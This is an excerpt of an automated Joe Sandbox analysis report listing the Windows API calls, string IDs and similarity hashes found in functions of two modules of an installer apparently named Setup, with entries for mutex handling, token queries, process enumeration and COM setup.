                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$Exception@8FileFreeModuleNamePathRelativeStringThrow_memcpy_s
                                                              • String ID: #(loc.$) <>"
                                                              • API String ID: 3035459583-3905424865
                                                              • Opcode ID: eefcc8f60c0383a10d7e80685dded5c809b3cebed941686e49c684cbae3f88fa
                                                              • Instruction ID: 2d9b46220af21b50bd4880028457392407e1095ffcf3f6a4443b5cfe9a51aefa
                                                              • Opcode Fuzzy Hash: eefcc8f60c0383a10d7e80685dded5c809b3cebed941686e49c684cbae3f88fa
                                                              • Instruction Fuzzy Hash: F511DC71D1111A9FCF10DFA4CC089EEB778BF21368B400A25E420A7F94D738C909DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C945874
                                                              • OpenMutexW.KERNEL32(00100000,00000000,00000030,?,Global\,00000000,6C95BDA7,?,00000000,?,?,?,?,?,Command-line option error: ,?), ref: 6C9458FB
                                                              • CreateMutexW.KERNEL32(00000000,00000000,00000030), ref: 6C94590B
                                                              • GetLastError.KERNEL32 ref: 6C945913
                                                                • Part of subcall function 6C948CD5: __EH_prolog3.LIBCMT ref: 6C948CDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3Mutex$CreateErrorLastOpen
                                                              • String ID: Global\
                                                              • API String ID: 2685780869-188423391
                                                              • Opcode ID: cc0f565dca9138db1cf83e0506ab6d9b63d03e6d91068d6d5668146622bdc498
                                                              • Instruction ID: 2e870261126a13f6a99b14ef7ee21358f0fbb8b6e6bb0de804d0ab805aa99707
                                                              • Opcode Fuzzy Hash: cc0f565dca9138db1cf83e0506ab6d9b63d03e6d91068d6d5668146622bdc498
                                                              • Instruction Fuzzy Hash: B721AF71601244DFDB15DFA4C488B9A7BF1AF65328F248499F854CF782CB74C954CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C934A46
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3
                                                              • String ID: evaluates to 'in maintenance mode'$ evaluates to 'not in maintenance mode'$MaintenanceMode determination$evaluating EnterMaintenanceModeIf
                                                              • API String ID: 431132790-4185790000
                                                              • Opcode ID: 5183a711936c51e2768bb100b7e1c32248536b08220ff8918a51eb55fec27bd7
                                                              • Instruction ID: 4fcbd28434b0e22bce743ee5fe0734e0fa8ec8641a2d28b989effcd403e33d3a
                                                              • Opcode Fuzzy Hash: 5183a711936c51e2768bb100b7e1c32248536b08220ff8918a51eb55fec27bd7
                                                              • Instruction Fuzzy Hash: AA118271801149EFDF10DBA8C944BEDBBB8AF26308F148456E564EBB81C771DB49CB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C49D2C6
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                              • SetDlgItemTextW.USER32(?,0000000B,00000000), ref: 6C49D2FC
                                                              • SetDlgItemTextW.USER32(?,00000008,00000000), ref: 6C49D33B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3ItemText
                                                              • String ID: IDS_CLOSE$IDS_CONTINUE
                                                              • API String ID: 2008326593-3637486705
                                                              • Opcode ID: 9bdc8381cc86d41e185d195eb72081791d69079024833c563ecf4323e764e121
                                                              • Instruction ID: 283e92ffdac0c7680104a19c7befa9c95169adb449f2f43a0f7433a273db52ef
                                                              • Opcode Fuzzy Hash: 9bdc8381cc86d41e185d195eb72081791d69079024833c563ecf4323e764e121
                                                              • Instruction Fuzzy Hash: 63113C31A005059FDB10EBE8C989EAEB7F1BF49314F14425CE116AB7E0DB30E904CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C4A584F
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B), ref: 6C4A58BC
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000010,00000008,00000008,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B), ref: 6C4A591F
                                                              • _strnlen.LIBCMT ref: 6C4A596F
                                                                • Part of subcall function 6C4A83ED: __CxxThrowException@8.LIBCMT ref: 6C4A83E2
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,6C4A55AE,?,00000000,?,?,?,?,00000024,6C48F18B,?), ref: 6C4A599C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$ChangeCloseException@8FindH_prolog3NotificationThrow_strnlen
                                                              • String ID:
                                                              • API String ID: 182814276-0
                                                              • Opcode ID: 28c5ecde34a20941d8641eeb375bc766c7ce6b41032d8893a6877d35e4b4599f
                                                              • Instruction ID: 423a0381adfa5a1aede11f7d6ec571bb6d4bd412511fbd0babfae7c860caf62e
                                                              • Opcode Fuzzy Hash: 28c5ecde34a20941d8641eeb375bc766c7ce6b41032d8893a6877d35e4b4599f
                                                              • Instruction Fuzzy Hash: 93717D7190014A9FDF00CFA8C845EEEBBB4FF14328F044619F924AB695D770DA1ACBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C95A4B6
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000000,?,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A523
                                                              • GetTokenInformation.KERNELBASE(?,00000001,00000000,00000008,00000008,00000008,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A566
                                                              • LookupAccountSidW.ADVAPI32(00000000,00000000,00000000,00000008,00000010,00000008,6C944614,00000008,00000104,?,?,6C95A210,?,00000000), ref: 6C95A59C
                                                                • Part of subcall function 6C968AFC: _wcsnlen.LIBCMT ref: 6C968B0C
                                                              • FindCloseChangeNotification.KERNEL32(?,?,?,6C95A210,?,00000000,?,?,6C944B23), ref: 6C95A5CF
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: InformationToken$AccountChangeCloseFindH_prolog3LookupNotification_wcsnlen
                                                              • String ID:
                                                              • API String ID: 385857651-0
                                                              • Opcode ID: 9690e59a7b2e53887c9dc71d2971870f117dec0b309d3f815313a3f206f19271
                                                              • Instruction ID: 59bd84f5524f235aa9516c82d84611d1a6fee3bdb69b05ee25b580afd98dc481
                                                              • Opcode Fuzzy Hash: 9690e59a7b2e53887c9dc71d2971870f117dec0b309d3f815313a3f206f19271
                                                              • Instruction Fuzzy Hash: 56613A729002099BDF01CFA8C845AEE7BB5BF25328F144609F920A77D0DB74DA65CBA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C94488A
                                                                • Part of subcall function 6C9431D3: __EH_prolog3_catch.LIBCMT ref: 6C9431DA
                                                                • Part of subcall function 6C9431D3: _free.LIBCMT ref: 6C943269
                                                              • GetCurrentThread.KERNEL32 ref: 6C94495F
                                                              • OpenThreadToken.ADVAPI32(00000000,00000008,00000001,?), ref: 6C944971
                                                              • GetCurrentProcess.KERNEL32 ref: 6C94497B
                                                              • OpenProcessToken.ADVAPI32(00000000,00000008,?), ref: 6C94498B
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: CurrentOpenProcessThreadToken$H_prolog3_H_prolog3_catch_free
                                                              • String ID:
                                                              • API String ID: 4058884840-0
                                                              • Opcode ID: 7ef450da68c20fefea9bb1beb0b8833fea27fb0f3bc2ffa3dc3e098979a21fea
                                                              • Instruction ID: f5a611f64adae2de7b23ff9aa7241f52f97f13fed55136cae2c9713bf1969852
                                                              • Opcode Fuzzy Hash: 7ef450da68c20fefea9bb1beb0b8833fea27fb0f3bc2ffa3dc3e098979a21fea
                                                              • Instruction Fuzzy Hash: 3D51F7B19002598BDF24DFA4C995BDDB7B4BF24308F5084EA951AB7A40DB709F88CF61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C925CE8
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • CoInitialize.OLE32(00000000), ref: 6C925D1A
                                                              • CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000), ref: 6C925D38
                                                              • CoUninitialize.OLE32(?,?,00000014,6C925F14,?,?,?,?,512AC3CC,ParameterInfo.xml,00000000,?,ParameterInfo.xml,?,00000000,?), ref: 6C925DE8
                                                              • SysFreeString.OLEAUT32(00000738), ref: 6C925DF1
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$CreateException@8FileFreeInitializeInstanceModuleNamePathRelativeStringThrowUninitialize
                                                              • String ID:
                                                              • API String ID: 2737710906-0
                                                              • Opcode ID: 2282a8ec3f814ad08e0b30ed09eaf15eff463822d67f942cd2dbbc9dceb79e01
                                                              • Instruction ID: 5e309e84ae4c99f9dc208c107d4eeddb0ab7f240c952ad4f681a902c0e36760e
                                                              • Opcode Fuzzy Hash: 2282a8ec3f814ad08e0b30ed09eaf15eff463822d67f942cd2dbbc9dceb79e01
                                                              • Instruction Fuzzy Hash: 0C415EB0A11249EFDF00CFA4C888AAD7BB9BF55308F2484A8F595DB645C739DE45CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C959BC3
                                                                • Part of subcall function 6C94833E: __EH_prolog3.LIBCMT ref: 6C948345
                                                                • Part of subcall function 6C91A8CC: __EH_prolog3.LIBCMT ref: 6C91A8D3
                                                                • Part of subcall function 6C91A8CC: PathIsRelativeW.SHLWAPI(00000000,00000000,?,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A90B
                                                                • Part of subcall function 6C91A8CC: GetModuleFileNameW.KERNEL32(00000010,00000104,?,?,?,?,00000001,?,UiInfo.xml,?,?,00000000,?), ref: 6C91A964
                                                                • Part of subcall function 6C91A8CC: __CxxThrowException@8.LIBCMT ref: 6C91AA28
                                                              • GetCommandLineW.KERNEL32(?,?,6C90A794,?,?,00000164,6C934730,02642228,6C90A794,?,?,?,6C95B57F,?,00000000,?), ref: 6C959BEF
                                                                • Part of subcall function 6C913E77: __EH_prolog3.LIBCMT ref: 6C913E7E
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959C42
                                                              • SysFreeString.OLEAUT32(6C94FA6E), ref: 6C959CCC
                                                              • SysFreeString.OLEAUT32(?), ref: 6C959CF3
                                                                • Part of subcall function 6C93473C: __EH_prolog3_catch.LIBCMT ref: 6C934746
                                                                • Part of subcall function 6C93473C: CoInitialize.OLE32(00000000), ref: 6C9347F7
                                                                • Part of subcall function 6C93473C: CoCreateInstance.OLE32(6C90A974,00000000,00000017,6C90A9A4,?,?,?,?,?,6C913864,?,00000000,00000000,6C94FA6E,00000738,IronMan::EngineData::CreateEngineData), ref: 6C934815
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$FreeString$CommandCreateException@8FileH_prolog3_catchInitializeInstanceLineModuleNamePathRelativeThrow
                                                              • String ID:
                                                              • API String ID: 3727545618-0
                                                              • Opcode ID: ddac5b69c6f891cc18835635acc0096d8d903f9e4eaf16b0c4d1ca9e2c41c5dd
                                                              • Instruction ID: 01f5f68de264a78d04c3595da2be3177a159e2faf08d166e790470c3edb8fe6a
                                                              • Opcode Fuzzy Hash: ddac5b69c6f891cc18835635acc0096d8d903f9e4eaf16b0c4d1ca9e2c41c5dd
                                                              • Instruction Fuzzy Hash: 5A41257280024DEFDF01DFA4CC44AEEBBB9AF25318F104155E525A7A90CB34DA19CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3_GS.LIBCMT ref: 6C49665C
                                                                • Part of subcall function 6C49E8E8: __EH_prolog3.LIBCMT ref: 6C49E8EF
                                                                • Part of subcall function 6C49F35E: __EH_prolog3.LIBCMT ref: 6C49F365
                                                                • Part of subcall function 6C49F35E: __recalloc.LIBCMT ref: 6C49F3A7
                                                              • _memset.LIBCMT ref: 6C4966C3
                                                              • GetClientRect.USER32 ref: 6C4966E6
                                                              • SendMessageW.USER32(00000001,00000432,00000000,?), ref: 6C4966FC
                                                                • Part of subcall function 6C4A81DE: _memcpy_s.LIBCMT ref: 6C4A8224
                                                              • RaiseException.KERNEL32(C000008C,00000001,00000000,00000000,?,00000040,6C49730F,?,?,?,?,?,?,?,?,?), ref: 6C496713
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: H_prolog3$ClientExceptionH_prolog3_MessageRaiseRectSend__recalloc_memcpy_s_memset
                                                              • String ID:
                                                              • API String ID: 4097222183-0
                                                              • Opcode ID: c2f68cafad33883a537c59d8619b66ec96800ae953dfd70bf550330eb318c2dc
                                                              • Instruction ID: 083194bd1bd1c5c43eaf9e27d35cc7e01bb06654e3aad3ad0c022fe964278d7e
                                                              • Opcode Fuzzy Hash: c2f68cafad33883a537c59d8619b66ec96800ae953dfd70bf550330eb318c2dc
                                                              • Instruction Fuzzy Hash: 4C21E471901118AFDB24DFA8C888E9EBBB8FF45318F14411EF515A7650DB70AA46CBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • _malloc.LIBCMT ref: 6C970F72
                                                                • Part of subcall function 6C96BFB3: __FF_MSGBANNER.LIBCMT ref: 6C96BFCC
                                                                • Part of subcall function 6C96BFB3: __NMSG_WRITE.LIBCMT ref: 6C96BFD3
                                                                • Part of subcall function 6C96BFB3: RtlAllocateHeap.NTDLL(00000000,00000001,?,6C94831D,00000000,?,6C96C0C9,6C94F845,00000C00,00000020,6C94F845,?), ref: 6C96BFF8
                                                              • _free.LIBCMT ref: 6C970F85
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free_malloc
                                                              • String ID:
                                                              • API String ID: 1020059152-0
                                                              • Opcode ID: 9b7591d7fec2ab6a5e5feec2127e4c174aaca588326d457e6b54d2f5e8c84fd7
                                                              • Instruction ID: fe88e3566ba4614508fe34f3fe982b93c0e7fa7c6ea1129a1e746db4f0ccc5c3
                                                              • Opcode Fuzzy Hash: 9b7591d7fec2ab6a5e5feec2127e4c174aaca588326d457e6b54d2f5e8c84fd7
                                                              • Instruction Fuzzy Hash: 29110B3250A291EBDB311A79F91468D3A78AF613A8B215135F818DAE80EF35C45096F0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 6C4A5F27
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 6C4A5F3E
                                                              • CallWindowProcW.USER32(?,?,00000082,?,?), ref: 6C4A5F50
                                                              • GetWindowLongW.USER32(?,000000FC), ref: 6C4A5F6A
                                                              • SetWindowLongW.USER32(?,000000FC,?), ref: 6C4A5F79
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3303642901.000000006C481000.00000020.00000001.01000000.00000012.sdmp, Offset: 6C480000, based on PE: true
                                                              • Associated: 00000004.00000002.3303606880.000000006C480000.00000002.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303701703.000000006C4BF000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303750684.000000006C4C0000.00000008.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303786870.000000006C4C2000.00000004.00000001.01000000.00000012.sdmp
                                                              • Associated: 00000004.00000002.3303826195.000000006C4C5000.00000002.00000001.01000000.00000012.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c480000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$CallProc
                                                              • String ID:
                                                              • API String ID: 513923721-0
                                                              • Opcode ID: ae134b25d07bbe217795593d139242ae5d8ee26635580a5dd3e99a5c6017e841
                                                              • Instruction ID: 287def3923192555e1f92b9ac994cd0092f3aaff63d14a0a199f3e6d97a8bc4a
                                                              • Opcode Fuzzy Hash: ae134b25d07bbe217795593d139242ae5d8ee26635580a5dd3e99a5c6017e841
                                                              • Instruction Fuzzy Hash: 34211871604A04EFCB21DFA9C984D5ABBF1FB593207108A1DF8AAD2AA0D731E951DF50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog3.LIBCMT ref: 6C91970A
                                                              • VariantInit.OLEAUT32(?), ref: 6C91971B
                                                              • SysFreeString.OLEAUT32(6C90A794), ref: 6C919751
                                                              • SysAllocString.OLEAUT32(6C913864), ref: 6C919768
                                                              • VariantClear.OLEAUT32(?), ref: 6C91978E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: StringVariant$AllocClearFreeH_prolog3Init
                                                              • String ID:
                                                              • API String ID: 1692324188-0
                                                              • Opcode ID: 82afbaadc4d6afaa09f19d1366194a3a46f24d8e6c714fde74a6e60fbe866fee
                                                              • Instruction ID: 6ff9d9e90aefbbbace6f90768300bf82e8abdb95fc722f6f634d04d20af39237
                                                              • Opcode Fuzzy Hash: 82afbaadc4d6afaa09f19d1366194a3a46f24d8e6c714fde74a6e60fbe866fee
                                                              • Instruction Fuzzy Hash: E4116D70A04248EBDF11DFA4D848EDDB7B8BF25719F048159E824EBA40D778CA04DB60
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C935254
                                                              • _memset.LIBCMT ref: 6C93526E
                                                              • Process32FirstW.KERNEL32(00000000,?), ref: 6C935288
                                                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 6C9352A3
                                                              • FindCloseChangeNotification.KERNEL32(00000000), ref: 6C9352B7
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.3304072128.000000006C8F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C8F0000, based on PE: true
                                                              • Associated: 00000004.00000002.3304028618.000000006C8F0000.00000002.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304185671.000000006C99E000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304233751.000000006C99F000.00000008.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304274521.000000006C9A7000.00000004.00000001.01000000.0000000A.sdmp
                                                              • Associated: 00000004.00000002.3304312836.000000006C9AA000.00000002.00000001.01000000.0000000A.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_6c8f0000_Setup.jbxd
                                                              Similarity
                                                              • API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32_memset
                                                              • String ID:
                                                              • API String ID: 949835396-0
                                                              • Opcode ID: 458c84cb49e57d0d98cd48f3bf810be8b52667a48375f4fd41be00df8ed93d14
                                                              • Instruction ID: bac9d8b3c5ed6b8928ac6850b99fb3bd6dd76d71cb55042ee44710afd4af305d
                                                              • Opcode Fuzzy Hash: 458c84cb49e57d0d98cd48f3bf810be8b52667a48375f4fd41be00df8ed93d14
                                                              • Instruction Fuzzy Hash: D5019671601068ABDB10DBA5DC4CDDE77BCEB8A314F500165E928D3680DB34DF85CAE5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNEL32(?,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7BFB
                                                              • DeleteFileW.KERNEL32(?,00000000,?,6C490FC5,9F1A557E), ref: 6C4A7C0E
